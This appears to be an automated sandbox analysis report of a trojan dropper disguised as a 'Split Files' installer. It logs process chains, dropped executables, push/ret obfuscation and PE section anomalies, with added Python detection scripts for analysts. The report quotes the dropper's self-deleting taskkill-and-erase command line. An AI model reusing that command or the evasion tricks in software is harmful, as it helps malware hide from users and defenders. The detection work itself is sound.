Source: SplitFiles131.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PURGEABLE, IMAGE_SCN_MEM_16BIT, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp "C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process created: C:\Program Files (x86)\Split Files\SplitFiles131.exe "C:\Program Files (x86)\Split Files\SplitFiles131.exe"
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "SplitFiles131.exe" /f
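The process chain above (Inno Setup stub launched with /SL4, a stage-2 dropper in Program Files, a randomly named executable written under %APPDATA%\{GUID}\, and finally cmd.exe running taskkill and erase against the dropper itself) is the kind of pattern a detection engineer wants to match on process-creation telemetry rather than on hashes. The script below is an added example, not part of the sandbox report; the image paths and command lines in the sample events are copied from the lines above, the last event is a constructed benign control, and the regexes and finding names are the example's own choices.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of process-creation events: (parent image, child image, child
# command line).  Paths and command lines follow the report; the final event is a
# hand-written benign control (an operator killing a hung process), not report data.
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\file.exe",
     r"C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp",
     r'"C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp" /SL4 $502DC "C:\Users\user\Desktop\file.exe" 1694939 170496'),
    (r"C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp",
     r"C:\Program Files (x86)\Split Files\SplitFiles131.exe",
     r'"C:\Program Files (x86)\Split Files\SplitFiles131.exe"'),
    (r"C:\Program Files (x86)\Split Files\SplitFiles131.exe",
     r"C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe",
     r"C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe"),
    (r"C:\Program Files (x86)\Split Files\SplitFiles131.exe",
     r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit'),
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c taskkill /im "notepad.exe" /f'),
]

# Executable launched from a GUID-named directory directly under Roaming AppData.
GUID_DIR_RE = re.compile(r"\\AppData\\Roaming\\\{[0-9a-f-]{36}\}\\[^\\]+\.exe$", re.I)
# taskkill /im <name> /f, with or without quotes and with /f before or after.
TASKKILL_RE = re.compile(r'taskkill\s+(?:/f\s+)?/im\s+"?([^"\s&]+)"?', re.I)
# erase|del <path>, terminated by the next '&' or end of line.
ERASE_RE = re.compile(r'\b(?:erase|del)\s+"?([^"&]+?)"?\s*(?:&|$)', re.I)
# Inno Setup stage-2 stub: is-XXXXX.tmp\is-XXXXX.tmp" /SL<n> ...
INNO_RE = re.compile(r'\\is-[A-Z0-9]{5}\.tmp\\is-[A-Z0-9]{5}\.tmp"?\s+/SL', re.I)


def self_delete_target(parent_image, child_image, cmdline):
    """Return the erased path when cmd.exe is used to kill and delete its own parent.

    The report shows SysWOW64\cmd.exe as the image but System32\cmd.exe in the
    command line (WOW64 redirection), so everything is compared by basename."""
    if PureWindowsPath(child_image).name.lower() != "cmd.exe":
        return None
    kill, erase = TASKKILL_RE.search(cmdline), ERASE_RE.search(cmdline)
    if not (kill and erase):
        return None
    parent_name = PureWindowsPath(parent_image).name.lower()
    erased = erase.group(1).strip()
    if kill.group(1).lower() == parent_name and PureWindowsPath(erased).name.lower() == parent_name:
        return erased
    return None


def triage(events):
    """Run the three checks over (parent, child, cmdline) events; return (kind, parent, detail)."""
    findings = []
    for parent, child, cmdline in events:
        erased = self_delete_target(parent, child, cmdline)
        if erased:
            findings.append(("self_delete_via_cmd", parent, erased))
        if GUID_DIR_RE.search(child):
            findings.append(("exec_from_appdata_guid_dir", parent, child))
        if INNO_RE.search(cmdline):
            findings.append(("inno_setup_stage2", parent, child))
    return findings


if __name__ == "__main__":
    for kind, parent, detail in triage(SAMPLE_EVENTS):
        print(f"{kind:28} parent={parent}  detail={detail}")
```

The Inno Setup hit on its own is only context (legitimate installers produce the same /SL4 chain); the self-deletion and the GUID-directory execution are the two findings worth alerting on, and an analyst would correlate them with the same parent image before paging anyone.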
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040910C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB84E70, 0_2_0040910C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00453D80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6DB84E70, 1_2_00453D80
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SplitFiles131.exe")
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp
Source: classification engine Classification label: mal100.troj.evad.winEXE@12/39@0/5
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004547A0 GetModuleHandleA,6D715550,GetDiskFreeSpaceA, 1_2_004547A0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402BF0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification, 2_2_00405350
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040B090 FindResourceA,FreeResource, 1_2_0040B090
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Program Files (x86)\Split Files
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Command line argument: `a}{ 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Command line argument: MFE. 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Command line argument: ZK]Z 2_2_004096F0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Command line argument: ZK]Z 2_2_004096F0
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1970815 > 1048576

Data Obfuscation

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Unpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Unpacked PE file: 2.2.SplitFiles131.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.ave131:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406594 push 004065D1h; ret 0_2_004065C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404159 push eax; ret 0_2_00404195
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404229 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004042AA push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404327 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408BDC push 00408C0Fh; ret 0_2_00408C07
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040438C push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407F3C push ecx; mov dword ptr [esp], eax 0_2_00407F41
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00409A20 push 00409A5Dh; ret 1_2_00409A55
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040A107 push ds; ret 1_2_0040A108
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004302D0 push ecx; mov dword ptr [esp], eax 1_2_004302D5
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004063C0 push ecx; mov dword ptr [esp], eax 1_2_004063C1
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004785C8 push 00478673h; ret 1_2_0047866B
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00410798 push ecx; mov dword ptr [esp], edx 1_2_0041079D
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004129F0 push 00412A53h; ret 1_2_00412A4B
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0045AA9C push ecx; mov dword ptr [esp], eax 1_2_0045AAA1
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00450EB4 push 00450EE7h; ret 1_2_00450EDF
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040D0F0 push ecx; mov dword ptr [esp], edx 1_2_0040D0F2
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00443530 push ecx; mov dword ptr [esp], ecx 1_2_00443534
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004055BD push eax; ret 1_2_004055F9
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040F650 push ecx; mov dword ptr [esp], edx 1_2_0040F652
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040568D push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040570E push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004057F0 push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0040578B push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00479B20 push ecx; mov dword ptr [esp], ecx 1_2_00479B25
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00419CF0 push ecx; mov dword ptr [esp], ecx 1_2_00419CF5
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_004311AD push esi; ret 2_2_004311B6
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Code function: 2_2_0040F4BB push ecx; ret 2_2_0040F4CE
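Every "push <imm32>; ret" hit above has the same shape: the pushed address lies a few bytes past a later ret, so the ret acts as an unconditional jump that a linear disassembler will not follow. Delphi-compiled code, including Inno Setup stubs, uses this idiom legitimately in its try/finally epilogues, which is why processes 0 and 1 dominate the list; the same idiom inside the third-stage dropper deserves a closer look. The scanner below is an added example and not part of the report or the sandbox's own detection: it reproduces the report's first hit on a constructed byte buffer (the report gives addresses, not bytes, so the buffer contents are the example's own), and it is a byte-pattern heuristic rather than a disassembler.

```python
import struct

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def find_push_ret(code, code_va, image_base, image_size, window=0x200, slack=16):
    """Byte-level scan for the 'push <addr> ... ret' control-flow idiom.

    Reports a push imm32 (0x68) whose immediate lies inside the image and at
    most `slack` bytes past the first ret (0xC3) found within `window` bytes,
    plus any directly adjacent 'push r32; ret' pair (0x50..0x57, 0xC3).
    Returns (kind, push_va, ret_va, target) tuples.  A 0xC3 byte inside an
    operand can produce a false pairing: confirm hits in a real disassembler."""
    hi = image_base + image_size
    hits = []
    i = 0
    while i < len(code):
        op = code[i]
        if op == 0x68 and i + 5 <= len(code):
            target, = struct.unpack_from("<I", code, i + 1)
            if image_base <= target < hi:
                ret_off = code.find(b"\xC3", i + 5, min(len(code), i + 5 + window))
                if ret_off != -1:
                    ret_va = code_va + ret_off
                    if ret_va < target <= ret_va + slack:
                        hits.append(("push imm32; ret", code_va + i, ret_va, target))
            i += 5          # assume the 0x68 really was a push and skip its operand
            continue
        if 0x50 <= op <= 0x57 and i + 1 < len(code) and code[i + 1] == 0xC3:
            hits.append(("push %s; ret" % REGS[op - 0x50], code_va + i, code_va + i + 1, None))
            i += 2
            continue
        i += 1
    return hits


def build_sample_code():
    """Constructed code bytes (not taken from the sample) laid out like the report's
    first hit: push 004065D1h at 00406594, ret at 004065C9, target 8 bytes past the ret."""
    code = bytearray(b"\x90" * 0x100)                 # nop filler
    code[0x10:0x15] = b"\x68\x01\x00\x00\x00"         # push 1: immediate is not an image address
    code[0x40:0x42] = b"\x50\xC3"                     # push eax; ret (register form)
    code[0x94:0x99] = struct.pack("<BI", 0x68, 0x4065D1)
    code[0xC9] = 0xC3
    return bytes(code), 0x406500                      # buffer starts at VA 0x406500


if __name__ == "__main__":
    code, va = build_sample_code()
    for kind, push_va, ret_va, target in find_push_ret(code, va, 0x400000, 0x100000):
        print(f"{kind:18} push@{push_va:08X} ret@{ret_va:08X} target={'-' if target is None else '%08X' % target}")
```

To run it on the dropped file, pass the raw bytes of the .text section together with that section's virtual address and the image's base and SizeOfImage; the push-1 control in the sample shows why the in-image check matters, since plain constant pushes followed by a ret are common in normal code.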
Source: SplitFiles131.exe.1.dr Static PE information: section name: .ave131
Source: initial sample Static PE information: section name: .text entropy: 7.241012836973415
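Three static facts in this section point the same way: a section with a non-standard name (.ave131), a .text section whose characteristics decode to reserved and object-file-only bits (SYSHEAP, PURGEABLE/16BIT, LOCKED, alignment bits) that no linker sets in an image, and a .text entropy of 7.24, with the unpacked image later showing .ave131 as writable and executable. The script below is an added example, not part of the report: it parses the section table with the standard library only and flags those four conditions. The PE-shaped blob it scans is constructed for the example (no optional header, two sections); the characteristics value for .text is chosen so the same reserved bits are set, since the report lists the decoded flag names but not the raw DWORD.

```python
import math
import struct
from collections import Counter

# Section characteristics bits (PE/COFF specification).
IMAGE_SCN_CNT_CODE      = 0x00000020
IMAGE_SCN_CNT_INIT_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE   = 0x20000000
IMAGE_SCN_MEM_READ      = 0x40000000
IMAGE_SCN_MEM_WRITE     = 0x80000000
# SYSHEAP/PURGEABLE/16BIT/LOCKED/PRELOAD and the ALIGN nibble are reserved or only
# meaningful in object files; a linker leaves them clear in an executable image.
OBJECT_ONLY_MASK        = 0x00FF0000

STANDARD_NAMES = {b".text", b".rdata", b".data", b".idata", b".edata", b".rsrc",
                  b".reloc", b".tls", b".bss", b".pdata", b".CRT"}


def entropy(data):
    """Shannon entropy in bits per byte (8.0 is the maximum)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def sections(pe):
    """Yield (name, characteristics, raw_bytes) for every section header."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsect, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    for i in range(nsect):
        off = table + i * 40
        name = pe[off:off + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)
        chars, = struct.unpack_from("<I", pe, off + 36)
        yield name, chars, pe[raw_ptr:raw_ptr + raw_size]


def triage_sections(pe, entropy_threshold=7.0):
    """Return (section_name, reason) findings for the static indicators in the report."""
    findings = []
    for name, chars, raw in sections(pe):
        if name not in STANDARD_NAMES:
            findings.append((name, "non-standard section name"))
        if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE:
            findings.append((name, "writable and executable (RWX)"))
        if chars & OBJECT_ONLY_MASK:
            findings.append((name, "reserved/object-only characteristics bits set: 0x%08X" % chars))
        if chars & IMAGE_SCN_CNT_CODE and entropy(raw) > entropy_threshold:
            findings.append((name, "code section entropy %.2f (packed or encrypted?)" % entropy(raw)))
    return findings


def build_sample_pe():
    """Constructed two-section PE-shaped blob for the scanner; not the report's sample."""
    text_data = bytes(range(256)) * 2                 # entropy 8.0 stands in for packed code
    ave_data = b"\0" * 512
    hdr_end = 0x40 + 24 + 2 * 40                      # SizeOfOptionalHeader is 0 in this blob
    text_ptr = (hdr_end + 0x1FF) & ~0x1FF             # file-align the first section to 512
    ave_ptr = text_ptr + len(text_data)

    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)           # e_lfanew at 0x3C
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)

    def sect(name, va, raw, ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(raw), va, len(raw), ptr, 0, 0, 0, 0, chars)

    # .text: ordinary name, but reserved bits set (assumed value reproducing the report's flag list).
    text_hdr = sect(b".text", 0x1000, text_data, text_ptr,
                    IMAGE_SCN_CNT_CODE | 0x00170000 | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    # .ave131: non-standard name, RWX, as the unpacked image reports.
    ave_hdr = sect(b".ave131", 0x2000, ave_data, ave_ptr,
                   IMAGE_SCN_CNT_INIT_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
    blob = dos + coff + text_hdr + ave_hdr
    return blob + b"\0" * (text_ptr - len(blob)) + text_data + ave_data


if __name__ == "__main__":
    for name, reason in triage_sections(build_sample_pe()):
        print(name.decode(), "-", reason)
```

On a real file call triage_sections(open(path, "rb").read()); the parser honours SizeOfOptionalHeader, so it reads a normal image as well as the stripped-down blob. Treat the RWX finding on its own with care: the static file in the report only shows the odd name, and the executable-and-writable rights on .ave131 appear in the unpacked image, so the two views have to be compared rather than either one read alone.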
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dll
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\rf6CwnLa.exe
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Program Files (x86)\Split Files\SplitFiles131.exe
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Program Files (x86)\Split Files\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp File created: C:\Program Files (x86)\Split Files\is-5V8K4.tmp
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00423CD4 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423CD4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00478118 IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00478118
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0042425C IsIconic,SetActiveWindow, 1_2_0042425C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_004242A4 IsIconic,SetActiveWindow,SetFocus, 1_2_004242A4
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_0041844C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_0041844C
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00422924 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_00422924
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00417660 IsIconic,GetCapture, 1_2_00417660
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00417D96 IsIconic,SetWindowPos, 1_2_00417D96
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Code function: 1_2_00417D98 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417D98
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-R8QPS.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-GA371.tmp\is-EPSRP.tmp Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy)
